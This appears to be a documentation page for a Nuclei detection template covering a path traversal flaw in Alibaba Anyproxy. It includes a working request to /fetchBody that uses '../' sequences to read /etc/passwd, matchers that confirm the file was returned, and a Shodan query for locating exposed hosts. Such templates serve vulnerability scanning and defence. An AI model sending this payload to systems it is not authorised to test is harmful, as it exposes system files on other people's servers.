Skip to content

Alibaba Anyproxy fetchBody File - Path Traversal

ID: alibaba-anyproxy-lfi

Severity: high

Author: DhiyaneshDk

Tags: alibaba,anyproxy,lfi

Alibaba Anyproxy is vulnerable to Path Traversal.

id: alibaba-anyproxy-lfi
info:
name: Alibaba Anyproxy fetchBody File - Path Traversal
author: DhiyaneshDk
severity: high
description: Alibaba Anyproxy is vulnerable to Path Traversal.
reference:
- https://github.com/alibaba/anyproxy/issues/391
- https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/Alibaba%20AnyProxy%20fetchBody%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
metadata:
verified: true
max-request: 1
shodan-query: html:"anyproxy"
tags: alibaba,anyproxy,lfi
http:
- method: GET
path:
- "{{BaseURL}}/fetchBody?id=1/../../../../../../../../etc/passwd"
matchers:
- type: dsl
dsl:
- regex('root:.*:0:0:', body)
- contains(body, '\"id\":')
- status_code == 200
condition: and
# digest: 4b0a00483046022100f61502587366917b110ade9d0434e4902384a0a152ad10586e6165410ee87665022100e4042ab1c7a13d7d3639667af039515d1cc21e757da65c4ff70d8bfda203aa27:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/vulnerabilities/other/alibaba-anyproxy-lfi.yaml"

View on Github